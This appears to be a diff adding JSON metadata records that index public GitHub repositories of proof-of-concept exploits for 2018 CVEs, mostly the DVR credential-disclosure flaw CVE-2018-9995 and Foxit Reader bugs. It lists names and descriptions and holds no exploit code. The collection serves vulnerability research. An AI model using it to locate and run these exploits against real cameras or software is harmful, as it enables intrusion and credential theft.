b/2018/CVE-2018-9539.json @@ -0,0 +1,33 @@ +[ + { + "id": 157086233, + "name": "CVE-2018-9539", + "full_name": "tamirzb\/CVE-2018-9539", + "owner": { + "login": "tamirzb", + "id": 1054209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4", + "html_url": "https:\/\/github.com\/tamirzb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamirzb\/CVE-2018-9539", + "description": " PoC code for CVE-2018-9539", + "fork": false, + "created_at": "2018-11-11T14:14:04Z", + "updated_at": "2019-07-11T00:57:55Z", + "pushed_at": "2018-11-11T14:19:32Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9546.json b/2018/CVE-2018-9546.json new file mode 100644 index 0000000000..49e0070158 --- /dev/null +++ b/2018/CVE-2018-9546.json @@ -0,0 +1,33 @@ +[ + { + "id": 173484457, + "name": "AOSP-DownloadProviderHeadersDumper", + "full_name": "IOActive\/AOSP-DownloadProviderHeadersDumper", + "owner": { + "login": "IOActive", + "id": 2120351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2120351?v=4", + "html_url": "https:\/\/github.com\/IOActive", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IOActive\/AOSP-DownloadProviderHeadersDumper", + "description": "PoC Exploiting Headers Disclosure in Android's Download Provider (CVE-2018-9546)", + "fork": false, + "created_at": "2019-03-02T18:32:17Z", + "updated_at": "2024-08-12T19:46:17Z", + "pushed_at": "2020-01-15T12:33:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9948.json b/2018/CVE-2018-9948.json new file mode 100644 index 0000000000..a6b0fd8f93 --- /dev/null +++ b/2018/CVE-2018-9948.json @@ -0,0 +1,64 @@ +[ + { + "id": 143491453, + "name": "Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958", + "full_name": "manojcode\/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958", + "owner": { + "login": "manojcode", + "id": 17510282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17510282?v=4", + "html_url": "https:\/\/github.com\/manojcode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manojcode\/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958", + "description": "Foxit Reader version 9.0.1.1049 Use After Free with ASLR and DEP bypass on heap", + "fork": false, + "created_at": "2018-08-04T02:32:28Z", + "updated_at": "2024-10-15T20:12:15Z", + "pushed_at": "2018-09-11T14:19:07Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 145526091, + "name": "cve-2018-9948-9958-exp", + "full_name": "orangepirate\/cve-2018-9948-9958-exp", + "owner": { + "login": "orangepirate", + "id": 40813235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40813235?v=4", + "html_url": "https:\/\/github.com\/orangepirate", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangepirate\/cve-2018-9948-9958-exp", + "description": "a exp for cve-2018-9948\/9958 , current shellcode called win-calc ", + "fork": false, + "created_at": "2018-08-21T07:43:38Z", + "updated_at": "2018-08-24T00:18:07Z", + "pushed_at": "2018-08-24T00:18:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9950.json b/2018/CVE-2018-9950.json new file mode 100644 index 0000000000..070efbe900 --- /dev/null +++ b/2018/CVE-2018-9950.json @@ -0,0 +1,33 @@ +[ + { + "id": 215226863, + "name": "PS-2017-13---CVE-2018-9950", + "full_name": "sharmasandeepkr\/PS-2017-13---CVE-2018-9950", + "owner": { + "login": "sharmasandeepkr", + "id": 16163884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16163884?v=4", + "html_url": "https:\/\/github.com\/sharmasandeepkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmasandeepkr\/PS-2017-13---CVE-2018-9950", + "description": null, + "fork": false, + "created_at": "2019-10-15T06:47:00Z", + "updated_at": "2019-10-15T06:48:25Z", + "pushed_at": "2019-10-15T06:48:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9951.json b/2018/CVE-2018-9951.json new file mode 100644 index 0000000000..bb79b2c498 --- /dev/null +++ b/2018/CVE-2018-9951.json @@ -0,0 +1,33 @@ +[ + { + "id": 215229783, + "name": "cve-2018-9951", + "full_name": "sharmasandeepkr\/cve-2018-9951", + "owner": { + "login": "sharmasandeepkr", + "id": 16163884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16163884?v=4", + "html_url": "https:\/\/github.com\/sharmasandeepkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmasandeepkr\/cve-2018-9951", + "description": null, + "fork": false, + "created_at": "2019-10-15T07:02:34Z", + "updated_at": "2019-10-15T07:03:20Z", + "pushed_at": "2019-10-15T07:03:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9958.json b/2018/CVE-2018-9958.json new file mode 100644 index 0000000000..27cfc96ebb --- /dev/null +++ b/2018/CVE-2018-9958.json @@ -0,0 +1,33 @@ +[ + { + "id": 138641204, + "name": "CVE-2018-9958--Exploit", + "full_name": "t3rabyt3-zz\/CVE-2018-9958--Exploit", + "owner": { + "login": "t3rabyt3-zz", + "id": 37320349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37320349?v=4", + "html_url": "https:\/\/github.com\/t3rabyt3-zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/t3rabyt3-zz\/CVE-2018-9958--Exploit", + "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.1049. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Text Annotations. When setting the point attribute, the process does not properly validate the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.", + "fork": false, + "created_at": "2018-06-25T19:34:36Z", + "updated_at": "2023-11-18T03:10:30Z", + "pushed_at": "2018-06-25T19:43:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-9995.json b/2018/CVE-2018-9995.json new file mode 100644 index 0000000000..402ab42fe3 --- /dev/null +++ b/2018/CVE-2018-9995.json @@ -0,0 +1,848 @@ +[ + { + "id": 131525463, + "name": "CVE-2018-9995_dvr_credentials", + "full_name": "ezelf\/CVE-2018-9995_dvr_credentials", + "owner": { + "login": "ezelf", + "id": 15113645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15113645?v=4", + "html_url": "https:\/\/github.com\/ezelf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ezelf\/CVE-2018-9995_dvr_credentials", + "description": "(CVE-2018-9995) Get DVR Credentials", + "fork": false, + "created_at": "2018-04-29T20:00:06Z", + "updated_at": "2024-11-26T15:48:21Z", + "pushed_at": "2019-01-23T14:27:21Z", + "stargazers_count": 524, + "watchers_count": 524, + "has_discussions": false, + "forks_count": 198, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 198, + "watchers": 524, + "score": 0, + "subscribers_count": 33 + }, + { + "id": 132603275, + "name": "CVE-2018-9995_Batch_scanning_exp", + "full_name": "zzh217\/CVE-2018-9995_Batch_scanning_exp", + "owner": { + "login": "zzh217", + "id": 26359175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26359175?v=4", + "html_url": "https:\/\/github.com\/zzh217", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzh217\/CVE-2018-9995_Batch_scanning_exp", + "description": "CVE-2018-9995_Batch_scanning_exp", + "fork": false, + "created_at": "2018-05-08T12:07:26Z", + "updated_at": "2018-11-29T12:00:35Z", + "pushed_at": "2018-08-09T14:41:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 132681023, + "name": "CVE-2018-9995_check", + "full_name": "Huangkey\/CVE-2018-9995_check", + "owner": { + "login": "Huangkey", + "id": 22346795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22346795?v=4", + "html_url": "https:\/\/github.com\/Huangkey", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Huangkey\/CVE-2018-9995_check", + "description": "DVR系列摄像头批量检测", + "fork": false, + "created_at": "2018-05-09T00:43:24Z", + "updated_at": "2024-10-07T12:01:24Z", + "pushed_at": "2018-05-09T10:13:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 133002644, + "name": "CVE-2018-9995-ModifiedByGwolfs", + "full_name": "gwolfs\/CVE-2018-9995-ModifiedByGwolfs", + "owner": { + "login": "gwolfs", + "id": 39183087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39183087?v=4", + "html_url": "https:\/\/github.com\/gwolfs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gwolfs\/CVE-2018-9995-ModifiedByGwolfs", + "description": null, + "fork": false, + "created_at": "2018-05-11T07:05:37Z", + "updated_at": "2018-05-21T06:35:44Z", + "pushed_at": "2018-05-21T06:35:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 139241933, + "name": "cve-2018-9995", + "full_name": "shacojx\/cve-2018-9995", + "owner": { + "login": "shacojx", + "id": 19655109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19655109?v=4", + "html_url": "https:\/\/github.com\/shacojx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shacojx\/cve-2018-9995", + "description": "exploit camera with vuln cve-2018-9995 ( Novo, CeNova, QSee, Pulnix, XVR 5 in 1 (title: \"XVR Login\"), Securus, - Security. Never Compromise !! - Night OWL, DVR Login, HVR Login, MDVR Login )", + "fork": false, + "created_at": "2018-06-30T10:54:40Z", + "updated_at": "2023-11-08T10:49:11Z", + "pushed_at": "2018-06-30T10:55:19Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 150025071, + "name": "DVR-Exploiter", + "full_name": "Cyb0r9\/DVR-Exploiter", + "owner": { + "login": "Cyb0r9", + "id": 43474676, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43474676?v=4", + "html_url": "https:\/\/github.com\/Cyb0r9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb0r9\/DVR-Exploiter", + "description": "DVR-Exploiter a Bash Script Program Exploit The DVR's Based on CVE-2018-9995", + "fork": false, + "created_at": "2018-09-23T20:58:40Z", + "updated_at": "2024-09-29T20:16:07Z", + "pushed_at": "2018-10-11T16:54:31Z", + "stargazers_count": 107, + "watchers_count": 107, + "has_discussions": false, + "forks_count": 37, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 37, + "watchers": 107, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 167874136, + "name": "CVE-2018-9995", + "full_name": "codeholic2k18\/CVE-2018-9995", + "owner": { + "login": "codeholic2k18", + "id": 47091820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47091820?v=4", + "html_url": "https:\/\/github.com\/codeholic2k18", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codeholic2k18\/CVE-2018-9995", + "description": "DVR username password recovery.", + "fork": false, + "created_at": "2019-01-28T00:16:48Z", + "updated_at": "2023-05-15T04:23:45Z", + "pushed_at": "2019-01-28T00:26:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 182380838, + "name": "CVE-2018-9995-ModifiedByGwolfs", + "full_name": "TateYdq\/CVE-2018-9995-ModifiedByGwolfs", + "owner": { + "login": "TateYdq", + "id": 23353269, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23353269?v=4", + "html_url": "https:\/\/github.com\/TateYdq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TateYdq\/CVE-2018-9995-ModifiedByGwolfs", + "description": null, + "fork": false, + "created_at": "2019-04-20T08:28:47Z", + "updated_at": "2019-04-20T08:29:04Z", + "pushed_at": "2019-04-20T08:29:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 188929132, + "name": "CVE-2018-9995_dvr_credentials", + "full_name": "ABIZCHI\/CVE-2018-9995_dvr_credentials", + "owner": { + "login": "ABIZCHI", + "id": 29470328, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29470328?v=4", + "html_url": "https:\/\/github.com\/ABIZCHI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ABIZCHI\/CVE-2018-9995_dvr_credentials", + "description": null, + "fork": false, + "created_at": "2019-05-28T01:05:16Z", + "updated_at": "2019-05-28T01:05:36Z", + "pushed_at": "2019-05-28T01:05:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 192182318, + "name": "CVE-2018-9995_dvr_credentials", + "full_name": "MrAli-Code\/CVE-2018-9995_dvr_credentials", + "owner": { + "login": "MrAli-Code", + "id": 591104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/591104?v=4", + "html_url": "https:\/\/github.com\/MrAli-Code", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrAli-Code\/CVE-2018-9995_dvr_credentials", + "description": null, + "fork": false, + "created_at": "2019-06-16T11:18:00Z", + "updated_at": "2020-04-10T15:31:58Z", + "pushed_at": "2019-06-16T11:18:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 206587573, + "name": "CVE-2018-9995_dvr_credentials-dev_tool", + "full_name": "likaifeng0\/CVE-2018-9995_dvr_credentials-dev_tool", + "owner": { + "login": "likaifeng0", + "id": 43924943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43924943?v=4", + "html_url": "https:\/\/github.com\/likaifeng0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likaifeng0\/CVE-2018-9995_dvr_credentials-dev_tool", + "description": "webcam bug (python)", + "fork": false, + "created_at": "2019-09-05T14:45:16Z", + "updated_at": "2024-08-12T19:52:41Z", + "pushed_at": "2019-09-05T14:46:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 228378439, + "name": "CVE-2018-9995-POC", + "full_name": "b510\/CVE-2018-9995-POC", + "owner": { + "login": "b510", + "id": 47598258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47598258?v=4", + "html_url": "https:\/\/github.com\/b510", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b510\/CVE-2018-9995-POC", + "description": "CVE-2018-9995 POC", + "fork": false, + "created_at": "2019-12-16T12:05:41Z", + "updated_at": "2021-03-25T20:18:52Z", + "pushed_at": "2019-12-16T12:17:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 240645904, + "name": "HTC", + "full_name": "wmasday\/HTC", + "owner": { + "login": "wmasday", + "id": 52761911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52761911?v=4", + "html_url": "https:\/\/github.com\/wmasday", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wmasday\/HTC", + "description": "Hack The CCTV | DVRs; Credentials Exposed | CVE-2018-9995", + "fork": false, + "created_at": "2020-02-15T04:42:17Z", + "updated_at": "2023-11-07T01:43:36Z", + "pushed_at": "2023-07-27T11:46:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 351601225, + "name": "HTC", + "full_name": "awesome-consumer-iot\/HTC", + "owner": { + "login": "awesome-consumer-iot", + "id": 81392267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81392267?v=4", + "html_url": "https:\/\/github.com\/awesome-consumer-iot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/awesome-consumer-iot\/HTC", + "description": "Hack The CCTV | DVRs; Credentials Exposed | CVE-2018-9995", + "fork": false, + "created_at": "2021-03-25T23:12:31Z", + "updated_at": "2024-10-03T07:28:13Z", + "pushed_at": "2020-02-15T05:01:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 353030285, + "name": "CVE-2018-9995", + "full_name": "Saeed22487\/CVE-2018-9995", + "owner": { + "login": "Saeed22487", + "id": 80916721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80916721?v=4", + "html_url": "https:\/\/github.com\/Saeed22487", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saeed22487\/CVE-2018-9995", + "description": "CVE-2018-9995 هک دوربین مداربسته با آسیب پذیری ", + "fork": false, + "created_at": "2021-03-30T14:27:54Z", + "updated_at": "2022-01-29T02:58:23Z", + "pushed_at": "2020-06-13T05:09:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 374551249, + "name": "CVE-2018-9995-2", + "full_name": "kienquoc102\/CVE-2018-9995-2", + "owner": { + "login": "kienquoc102", + "id": 84182708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84182708?v=4", + "html_url": "https:\/\/github.com\/kienquoc102", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kienquoc102\/CVE-2018-9995-2", + "description": null, + "fork": false, + "created_at": "2021-06-07T05:57:43Z", + "updated_at": "2024-02-05T07:01:52Z", + "pushed_at": "2021-11-15T11:26:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 434129582, + "name": "cve-2018-9995", + "full_name": "dearpan\/cve-2018-9995", + "owner": { + "login": "dearpan", + "id": 36843585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36843585?v=4", + "html_url": "https:\/\/github.com\/dearpan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dearpan\/cve-2018-9995", + "description": null, + "fork": false, + "created_at": "2021-12-02T07:52:28Z", + "updated_at": "2021-12-02T07:54:57Z", + "pushed_at": "2021-12-02T07:54:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 460693284, + "name": "Tool_Exploit_Password_Camera_CVE-2018-9995", + "full_name": "LeQuocKhanh2K\/Tool_Exploit_Password_Camera_CVE-2018-9995", + "owner": { + "login": "LeQuocKhanh2K", + "id": 75305251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75305251?v=4", + "html_url": "https:\/\/github.com\/LeQuocKhanh2K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeQuocKhanh2K\/Tool_Exploit_Password_Camera_CVE-2018-9995", + "description": null, + "fork": false, + "created_at": "2022-02-18T03:17:31Z", + "updated_at": "2022-02-18T03:18:21Z", + "pushed_at": "2022-05-12T02:35:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478772554, + "name": "CVE-2018-9995", + "full_name": "hoaan1995\/CVE-2018-9995", + "owner": { + "login": "hoaan1995", + "id": 91445089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91445089?v=4", + "html_url": "https:\/\/github.com\/hoaan1995", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hoaan1995\/CVE-2018-9995", + "description": null, + "fork": false, + "created_at": "2022-04-07T00:37:26Z", + "updated_at": "2024-08-12T20:22:12Z", + "pushed_at": "2022-04-07T06:53:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 586982605, + "name": "DVRFaultNET", + "full_name": "ST0PL\/DVRFaultNET", + "owner": { + "login": "ST0PL", + "id": 117662221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117662221?v=4", + "html_url": "https:\/\/github.com\/ST0PL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ST0PL\/DVRFaultNET", + "description": ".NET console application that exploits CVE-2018-9995 vulnerability", + "fork": false, + "created_at": "2023-01-09T17:29:22Z", + "updated_at": "2024-08-30T10:29:45Z", + "pushed_at": "2023-01-10T12:13:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680280916, + "name": "CVE-2018-9995-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2018-9995-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2018-9995-EXPLOIT", + "description": "A PoC exploit for CVE-2018-9995 - DVR Authentication Bypass", + "fork": false, + "created_at": "2023-08-18T19:42:17Z", + "updated_at": "2024-08-12T20:32:32Z", + "pushed_at": "2023-08-21T18:24:16Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "credentials", + "critical", + "cve-2018-9995", + "ethical-hacking", + "exploit", + "hacked", + "poc", + "security-research" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 695936317, + "name": "CVE-2018-9995", + "full_name": "Pab450\/CVE-2018-9995", + "owner": { + "login": "Pab450", + "id": 16840900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16840900?v=4", + "html_url": "https:\/\/github.com\/Pab450", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pab450\/CVE-2018-9995", + "description": "CVE-2018-9995 Exploit Tool for Python3", + "fork": false, + "created_at": "2023-09-24T17:00:37Z", + "updated_at": "2024-06-25T05:30:39Z", + "pushed_at": "2023-09-24T17:11:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 755085253, + "name": "CVE-2018-9995", + "full_name": "arminarab1999\/CVE-2018-9995", + "owner": { + "login": "arminarab1999", + "id": 150560738, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150560738?v=4", + "html_url": "https:\/\/github.com\/arminarab1999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arminarab1999\/CVE-2018-9995", + "description": null, + "fork": false, + "created_at": "2024-02-09T12:16:26Z", + "updated_at": "2024-02-09T12:19:15Z", + "pushed_at": "2024-02-09T12:19:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 759381350, + "name": "DVR_Sploit", + "full_name": "X3RX3SSec\/DVR_Sploit", + "owner": { + "login": "X3RX3SSec", + "id": 141476851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141476851?v=4", + "html_url": "https:\/\/github.com\/X3RX3SSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X3RX3SSec\/DVR_Sploit", + "description": "Simple python3 script to automate CVE-2018-9995", + "fork": false, + "created_at": "2024-02-18T12:46:32Z", + "updated_at": "2024-11-08T09:41:22Z", + "pushed_at": "2024-02-20T04:55:46Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798183460, + "name": "CVE-2018-9995_dvr_credentials", + "full_name": "batmoshka55\/CVE-2018-9995_dvr_credentials", + "owner": { + "login": "batmoshka55", + "id": 169349058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169349058?v=4", + "html_url": "https:\/\/github.com\/batmoshka55", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/batmoshka55\/CVE-2018-9995_dvr_credentials", + "description": null, + "fork": false, + "created_at": "2024-05-09T09:03:42Z", + "updated_at": "2024-10-20T10:45:58Z", + "pushed_at": "2024-10-20T10:45:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803581247, + "name": "Cam", + "full_name": 